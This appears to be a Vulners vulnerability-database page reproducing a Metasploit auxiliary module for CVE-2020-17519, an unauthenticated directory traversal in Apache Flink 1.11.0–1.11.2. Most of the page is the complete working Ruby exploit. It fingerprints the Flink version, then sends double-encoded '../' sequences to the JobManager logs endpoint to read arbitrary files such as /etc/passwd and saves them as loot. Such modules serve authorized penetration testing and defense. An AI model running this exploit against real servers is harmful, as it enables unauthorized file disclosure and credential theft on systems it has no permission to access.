Lucene search
Apache Flink JobManager Traversal
🗓️ 22 Feb 2021 23:58:03Reported by 0rich1 - Ant Security FG Lab, Hoa Nguyen - Suncsr Team, bcoles <[email protected]>Type 
metasploit🔗 www.rapid7.com👁 49 Views
Apache Flink JobManager Traversal module exploits unauthenticated directory traversal vulnerability in Apache Flink versions 1.11.0 <= 1.11.2, allowing retrieval of arbitrary files with the privileges of the web server user. Tested successfully on Apache Flink version 1.11.2 on Ubuntu 18.04.4
Show more
| Reporter | Title | Published | Views | Family All 32 |
|---|---|---|---|---|
 | Design/Logic Flaw | 5 Jan 202112:15 | – | prion |
 | Directory Traversal | 8 Jan 202113:59 | – | veracode |
 | Apache Flink - Local File Inclusion | 6 Jan 202107:08 | – | nuclei |
 | Path Traversal in Apache Flink | 6 Jan 202120:01 | – | github |
 | Apache Flink Directory Traversal | 8 Jan 202100:00 | – | dsquare |
 | Exploit for Files or Directories Accessible to External Parties in Apache Flink | 10 Jan 202101:24 | – | githubexploit |
| Exploit for Files or Directories Accessible to External Parties in Apache Flink | 18 Jan 202102:03 | – | githubexploit |
| Exploit for Files or Directories Accessible to External Parties in Apache Flink | 25 Feb 202111:06 | – | githubexploit |
| Exploit for Files or Directories Accessible to External Parties in Apache Flink | 6 Jan 202102:15 | – | githubexploit |
| Exploit for Files or Directories Accessible to External Parties in Apache Flink | 14 Jan 202110:45 | – | githubexploit |
10
##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
class MetasploitModule < Msf::Auxiliary
include Msf::Exploit::Remote::HttpClient
include Msf::Auxiliary::Scanner
include Msf::Auxiliary::Report
def initialize(info = {})
super(
update_info(
info,
'Name' => 'Apache Flink JobManager Traversal',
'Description' => %q{
This module exploits an unauthenticated directory traversal vulnerability
in Apache Flink versions 1.11.0 <= 1.11.2. The JobManager REST API fails
to validate user-supplied log file paths, allowing retrieval of arbitrary
files with the privileges of the web server user.
This module has been tested successfully on Apache Flink version 1.11.2
on Ubuntu 18.04.4.
},
'Author' => [
'0rich1 - Ant Security FG Lab', # Vulnerability discovery
'Hoa Nguyen - Suncsr Team', # Metasploit module
'bcoles', # Metasploit module cleanup and improvements
],
'License' => MSF_LICENSE,
'References' => [
['CVE', '2020-17519'],
['CWE', '22'],
['EDB', '49398'],
['PACKETSTORM', '160849'],
['URL', 'https://www.openwall.com/lists/oss-security/2021/01/05/2'],
['URL', 'https://www.tenable.com/cve/CVE-2020-17519']
],
'DefaultOptions' => { 'RPORT' => 8081 },
'DisclosureDate' => '2021-01-05',
'Notes' => {
'Stability' => [CRASH_SAFE],
'Reliability' => [],
'SideEffects' => [IOC_IN_LOGS]
}
)
)
register_options([
OptInt.new('DEPTH', [ true, 'Depth for path traversal', 10]),
OptString.new('FILEPATH', [true, 'The path to the file to read', '/etc/passwd'])
])
end
def check_host(_ip)
res = send_request_cgi({
'method' => 'GET',
'uri' => normalize_uri(target_uri.path, 'config')
})
unless res
return Exploit::CheckCode::Unknown('No reply.')
end
unless res.body.include?('flink')
return Exploit::CheckCode::Safe('Target is not Apache Flink.')
end
version = res.get_json_document['flink-version']
if version.blank?
return Exploit::CheckCode::Detected('Could not determine Apache Flink software version.')
end
if Rex::Version.new(version).between?(Rex::Version.new('1.11.0'), Rex::Version.new('1.11.2'))
return Exploit::CheckCode::Appears("Apache Flink version #{version} appears vulnerable.")
end
Exploit::CheckCode::Safe("Apache Flink version #{version} is not vulnerable.")
end
def retrieve_file(depth, filepath)
traversal = Rex::Text.uri_encode(Rex::Text.uri_encode("#{'../' * depth}#{filepath}", 'hex-all'))
res = send_request_cgi({
'method' => 'GET',
'uri' => normalize_uri(target_uri.path, 'jobmanager', 'logs', traversal)
})
unless res
print_error('No reply')
return
end
if res.code == 404
print_error('File not found')
return
end
if res.code == 500
print_error("Unexpected reply (HTTP #{res.code}): Server encountered an error attempting to read file")
msg = res.body.scan(/Caused by: (.+?)\\n/).flatten.last
print_error(msg) if msg
return
end
if res.code != 200
print_error("Unexpected reply (HTTP #{res.code})")
return
end
res.body.to_s
end
def run_host(ip)
depth = datastore['DEPTH']
filepath = datastore['FILEPATH']
print_status("Downloading #{filepath} ...")
res = retrieve_file(depth, filepath)
return if res.blank?
print_good("Downloaded #{filepath} (#{res.length} bytes)")
path = store_loot(
'apache.flink.jobmanager.traversal',
'text/plain',
ip,
res,
File.basename(filepath)
)
print_good("File #{filepath} saved in: #{path}")
end
end
Transform Your Security Services
Elevate your offerings with Vulners' advanced Vulnerability Intelligence. Contact us for a demo and discover the difference comprehensive, actionable intelligence can make in your security strategy.
Book a live demo22 Feb 2021 23:03Current
0.3Low risk
Vulners AI Score0.3
CVSS25
CVSS37.5
EPSS0.94413